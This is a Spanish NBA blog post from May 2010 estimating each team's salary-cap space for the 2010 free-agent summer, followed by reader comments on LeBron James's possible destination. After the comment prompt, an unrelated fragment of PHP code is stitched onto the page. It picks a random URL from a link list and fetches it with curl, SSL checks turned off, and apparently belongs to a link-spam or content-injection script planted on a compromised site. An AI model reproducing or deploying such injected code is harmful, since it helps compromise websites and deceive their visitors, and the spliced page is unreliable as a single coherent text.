¿Cómo llegan los equipos al verano de 2010?

14 de May de 2010 por txusma

La eliminación de los Cavs ha acelerado los rumores sobre el posible destino de Lebron para la temporada que viene y de rebote, los rumores sobre los diferentes movimientos que podrían llevarse a cabo. Muchos equipos han hecho espacio para contratar a una o dos de las grandes estrellas de la liga que salen al mercado pero saber exactamente cuánto espacio han hecho puede resultar complicado. Hay que tener en cuenta los contratos con opciones de jugadores que se ejercerán, las elecciones del draft, si hay algún jugador que puede abandonar el equipo antes de tiempo gracias a una “player option” no ejercida, etc… Vamos a ver si podemos aclarar un poco la situación de los equipos capaces de fichar a los grandes agentes libres del verano teniendo en cuenta que el límite salarial se situará en los 56.1 millones de dólares:

Miami Heat: Asumimos que Dwyane Wade abandonará el equipo por lo que los 17.15 millones que debería cobrar dejan de computar en el límite de los de Florida. Esto deja a Michael Beasley y Daequan Cook como los únicos jugadores con contrato lo que suma 7.13 millones para la 2010-2011. Miami tiene además el pick 18 de la primera ronda lo que le supondrá un gasto de 1.2 millones adicionales. Hay un par de jugadores con una ‘Team Option’, James Jones por unos 5 kilos y Mario Chalmers por 0.8. Parece razonable pensar que los Heat ejercerán la segunda opción y pasarán de la primera. Hasta aquí nos hemos gastado 9.13 millones, por lo que el espacio salarial sube hasta los 47 millones de dólares.  Teniendo en cuenta que el máximo a lo que aspiran en su primer año los Bosh, Wade, Lebron y compañía son unos 18 millones de dólares Miami podría fichar a un par de estos y aún tendría 11 kilos y la MidLevel para rellenar la plantilla con 6 o 7 jugadores. El equipo podría quedar apañadete…

New York Knicks: Si nos preguntan por el nombre de un equipo que sueña con el verano del 2010 a todos nos viene rápidamente a la cabeza la franquicia de la Gran Manzana y no es para menos: llevan 2 o 3 temporadas moviéndose con el único objetivo de tener el espacio salarial necesario para fichar a Lebron James. Llegarán al mercado con un total de 18 millones en contratos: Danillo Gallinari, Wilson Chandler, Toney Douglas y… Eddie Curry (tiene una Player Option de 11 kilos que evidentemente ejercerá. Y más vale que lo ahorre). Como no tiene elecciones de primera ronda y considerando que podría ofrecer contratos bajos para rellenar el roster también podría tener dinero para fichar a dos de los grandes. Evidentemente, esto implicaría la renuncia de David Lee y Sergio Rodríguez. Lo que ya no se ve tan claro es si un quinteto formado por Douglas, Chandler, Lebron, Bosh, X, Gallinari de sexto hombre y un banco lleno de contratos mínimos (a excepción de la MidLevel) puede optar a alguna cosa.

New Jersey Nets: Hasta aquí los equipos que podrían fichar a 2 de los grandes. Los Nets para el año que viene tienen a 7 jugadores en cartera y una opción muy rica de 0.8 millones sobre Chris Douglas-Roberts que yo ejercería. Si asumimos que se llevarán el número 1 del draft (4.3 millones más) y se quedarán con la elección de los Mavs (cerca de un millón) llegan al mercado con unos 31 millones hipotecados y un hueco de 25, suficiente para fichar a uno de los grandes y alguna que otra pieza decente. Ojito por que un equipo con Lebron y John Wall queda la mar de majo. Harris, Lee, Lebron, Yi, Brook con un banco con Wall, T. Williams, Douglas-Roberts, Humphries y algún fichaje tiene muuy buena pinta. Incluso se podrían plantear traspasar a Harris por un buen 4, darle la batuta del equipo a John Wall y que tiemblen los demás.

Chicago Bulls: 31 millones comprometidos en Derrick Rose, Luol Deng, Joakim Noah y Kirk Hinrich, y los rookies Taj Gibson y James Johnson. Podríamos decir que no están mal invertidos. Contamos 1.2 millones más por su elección de primera ronda y se quedan con unos 23 millones de hueco. Podrían fichar a un mega crack y les quedarían 5 millones para rellenar la plantilla con 4 jugadores. Tampoco les pinta mal la cosa.

Sacramento Kings: 33.2 millones invertidos en 10 jugadores. Si le sumamos lo que les costará su elección en el draft nos queda que llegarán al mercado con unos 36 millones comprometidos, un hueco de unos 20 kilos. Más que suficiente para fichar a una estrella y suficiente del todo para acometer 2 buenos fichajes que mejoren la plantilla.

Washington Wizards: Tengo la impresión que siempre nos olvidamos de los Wizards al pensar en el mercado de agentes libres pero la realidad es que podrían fichar a uno de los grandes y si Gilbert Arenas no existiera serían de los que más probabilidades tendrían de lograrlo, posiblemente. Suponiendo que renuncian a Josh Howard y sus 11 kilos de contrato (tampoco es mucho suponer), que Quinton Ross se quedará (y con él los 1.15 millones que cobrará) y que su elección en el draft puede ser alta (pongamos una 4 o una 5, unos 3 millones) podrían llegar con sólo 33 millones comprometidos. ¿Qué harán con los 4.8 millones de la Qualifyng Offer de Randy Foye? Si la ejercen les quedan unos 18 kilos que podrían ser suficientes para fichar a uno de los grandes aunque parece muy justo. Si no, crecen sus oportunidades.

Los Angeles Clippers: A priori su situación puede parecer parecida a la de los Kings (33 millones comprometidos + elección en el draft) pero lo cierto es que con esos 20-21 millones que les sobran han de rellenar 6 ó 7 huecos de la plantilla. Si fichan a uno de los peces gordos les quedaría muy poquito para el resto pero dos buenas piezas sí que podrían cazar.

Minnessota Timberwolves: A los Wolves les haría falta un poco de magia financiera para lograr tener el espacio salarial necesario para fichar a unos de los grandes. Ahora tienen comprometidos 35 millones pero tienen 3 primeras rondas (una de ellas será muy alta) que les supondrían unos 5-6 millones más y además durante la pretemporada el salario de Ricky Rubio vuelve a contar en los cálculos de Minnessota así que a priori no parecen tener suficiente dinero. Pero si venden sus rondas y/o traspasan a algún jugador podrían llegar a abrir hueco. Habrá que estar atentos a los movimientos de los Wolves porque se rumorea que Al Jefferson podría abandonar la franquicia.

Y hasta aquí. Miami y New York podrían fichar hasta a 2 de los grandes y varios equipos pueden fichar a uno sin apuros. Evidentemente, estos jugadores pueden firmar de nuevo con sus equipos pero tengamos en cuenta que en el momento que abandonen sus franquicias estas no pueden fichar a otro en su lugar porque ya están por encima del límite (nos referimos principalmente a los casos de Lebron James, Chris Bosh, Dwyane Wade, Joe Johnson y Dirk Nowitzki). En todo caso la lista de agentes libres es bastante amplia y sus fichajes y renovaciones afectarán sin duda a los otros movimientos del mercado y las cantidades que finalmente firmen todos ellos.

Espero no haberme equivocado en ningún número. Si veis algún error lo completamos en los comentarios. En todo caso me he basado en un artículo aparecido en ESPN hace unos meses que he actualizado con el nuevo valor del límite salarial decidido en abril.

Comenta

18 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Los Thunder tambien pueden pescar, creo que tienen 40 millones comprometidos, asi que les da para contratar a dos mas que decentes, a no ser que Kristic use su player option (5,8 m) y entonces tendrian unos 10 millones para gastar…

      Citar

  2. sergio dice:
    #2

    Pues mira… Krstic mas otro par de ellos a Minnessotta a cambia de Jefferson no estaria mal. Y buena pesca seria esa..

      Citar

  3. Love Denise dice:
    #3

    Si yo fuera James renovaría por los Cavs. A pesar de los últimos fracasos, es un equipazo en toda regla, los demás son experimentos, aunque como 2º opción me iría a los Nets, que como ya se ha comentado, tiene jugadores bastante apañados + las elecciones del draft. Tiene pinta de que el año que viene van a dar guerra.
    Puestos a soñar…un Wall-Harris-James-Scola-Brook Lopez + un banquillo decente con Douglas Roberts, Lee, Tarrence, Boone, Humpries y Yi no estaría nada mal

      Citar

  4. Txusma dice:
    #4

    Los Thunder no tienen dinero suficiente para ofrecer el máximo a ningún agente libre por eso no los he incluído en la lista. Eso sí, sus 16 kilos libres les daría para hacer buenas adquisiciones y moverse mucho a base de traspasos…

      Citar

  5. portu dice:
    #5

    Como se marche Wade de Miami yo no veo a ningún gran FA yéndose para allá ( a no ser q sólo busque la pasta, claro, y se quede sin otra opción).
    Para NY parece q viene sonando mucho la pareja Joe Johnson-Lebron como lo predilecto, pero claro, suena mejor Lebron-Wade (y ojo, q no creo q ninguno de los dos esté sumamente preocupado por la pasta) y quizás tb un Lebron-Bosh. El quinteto q quedaría o el sexteto a mi me parecería muy similar a lo q tenían los Celtics al configurar el Big Three: Rondo(q prácticamente empezaba) y Perkins q era muy 2rio en valor a Al Jefferson, parecían en aquel momento dos piezas muy mediocres q sumar al Big Tree, pero salió bien y crecieron con ellos. Lo mismo puede suceder con T. Douglas como base, q ha demostrado q no es malo, mientras q W. Chandler y Gallinari ya muestran cositas más q interesantes para conformar quinteto. Sólo faltaría un hueco titular y si ya consiguieran recuperar a Curry ya sería como ganar el Euromillones…
    T. Douglas-W.Chandler-Lebron-Bosh-x-Gallinari suena fantástico…
    La opción Chicago tb sería un posible destino para una pareja de grandes, sobretodo pq por Lebron probablemente ofrecerían un sign&trade con L. Deng… además en este equipo sí cuadrarían mejor dos jugadores exteriores.
    Con los Nets creo q pasaría como con Miami sin Wade, equipo demasiado en construcción para los Lebron y cía, sin el aliciente de NY en cuanto a repercusión.
    Quien tb puede completar muy bien algún equipo podría ser Boozer o incluso podría haber sorpresa con Nowitzki…
    Joe Jonhson-Boozer para NY sería una opción bastante realista, conformarían un buen quinteto nuevamente…

      Citar

  6. Viva_Dirk dice:
    #6

    Los Heat renovando a Wade siguen teniendo hueco para un grande, sería el destino ideal para un interior, sea Bosh, Boozer o Amare, y aun tendrian hueco para un tio de 7-8 kilos.

      Citar

  7. NBA LAKERS BLOG dice:
    #7

    Sinceramente, dudo que LeBron termine en algún equipo mediocre. Ya en su séptimo año en la liga, no creo que quiera ir a un equipo donde tenga MENOS chances de alcanzar el título.

    De las opciones planteadas, como máxima opción veo al Heat, aunque aún así ese equipo necesitaría de un mejor interno… pero no neguemos que sería interesante ver qué hacen Wade y James juntos, porque si la franquicia de Miami comienza movimientos por LeBron, quizás hagan un esfuerzo por retener a Dwayne. Suena loco, pero es una posibilidad hablada desde hace mucho tiempo.

    Te espero en nuestro blog de los Lakers 😉

    Un fuerte abrazo!

    -NM-

      Citar

  8. max dice:
    #8

    Txusma, como lo tienen los Grizzlies? Ya se que es un equipo poco apetecible para cualquier estrella, pero tienen espacio salarial? Supongo que no, porque no los has mencionado, pero no me suena que tengan gente que cobre mucha pasta.

      Citar

  9. Txusma dice:
    #9

    Tiene a Zach q cobra 17 kilos y, atención, a Jaric cobrando 7 (quien fuera el serbio), pero están por debajo del límite. Lo que pasa es q el límite se lo comerán casi íntegro si ejecutan las Qualifyng Offers por Rudy Gay y Ronnie Brewer. Veremos que es lo q hacen pq sin esas Qualifyng tienen unos 9 millones de hueco.

      Citar

  10. max dice:
    #10

    Gracias por la info, Txus. Los 7 kilos de Jaric computan para el año que viene? No está traspasado al Real Madrid? Tampoco sabía que Zach cobraba tanta pasta…..

      Citar

  11. xapa_croack dice:
    #11

    cuanto de % puedes asegurar que wade se vaya????

      Citar

  12. kantonyo dice:
    #12

    Yo no veo a LeBron en Memphis, ni Miami, ni NJ, sinceramente todo me parece un paso atrás y ya no tiene 20 años.

    Creo que hay tres posibilidades grandes CLEVELAND, CHICAGO Y NY.

    Cada veo más factible lo de CHICAGO, con ROSE-WADE-JAMES.

      Citar

  13. sergio dice:
    #13

    Y jugaran con 3 balones en Chicago???

    A mi la historia me ha demostrado que un equipo campeón siempre se forma con un interior y un exterior estrellas. Lo de Jordan y Pippen fue un rara avis…, aparte de contar con Rodman durante 3 de los 6 títulos.

      Citar

  14. kantonyo dice:
    #14

    Tambien se ha demostrado que jugar con un balón sólo para LeBron no te lleva a ningún lado…

      Citar

  15. sergio dice:
    #15

    Touché….

      Citar

  16. portu dice:
    #16

    Estoy con Sergio, casi siempre ha hecho falta un interior solvente. Sigo viendo posibilidades para Chicago de completar un plantillón, sólo habría q incluir a L. Deng es un sign&trade por Lebron, y sin usar calculadora, creo q habría alguna posibilidad de juntar a Wade (si hubiese otro sign&trade con Hinrich, je,je) y alguna pieza interior interesante… quizás Boozer o Scola… sería un equipo descomunal:

    Rose-Wade-Lebron-Boozer-Noah
    Taj Gibson-James Johnson

      Citar

  17. sergio dice:
    #17

    Es que el Rose-Wade-Deng-Boozer/Bosh-Noah no es suficiente???

    Demasiada estrellita junta desde mi punto de vista si le añadimos a James. Además, con ese dinero tienes varios suplentes de calidad. Por ejemplo un supuesto David Lee que salga de NY, Haslem, Rip Hamilton… Y nunca dejaria salir a Hinrich, la verdad.

      Citar

  18. kantonyo dice:
    #18

    Lo que está claro es que Chicago lo tiene todo a favor para crecer este verano y colocarse como uno de los favoritos en el Este el año que viene. Seguiremos con LUPA al GM para ver como lo hace, pq hay tantas posibilidades!!

    ROSE-WADE-DENG-BOSH-NOAH
    ROSE-HINRICH-JAMES-BOOZER-NOAH
    ROSE-WADE-JAMES-GIBSON-NOAH
    ROSE-HINRICH-DENG-BOSH-BOOZER
    ROSE-JOHNSON-JAMES-BOSH-NOAH
    … etc

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>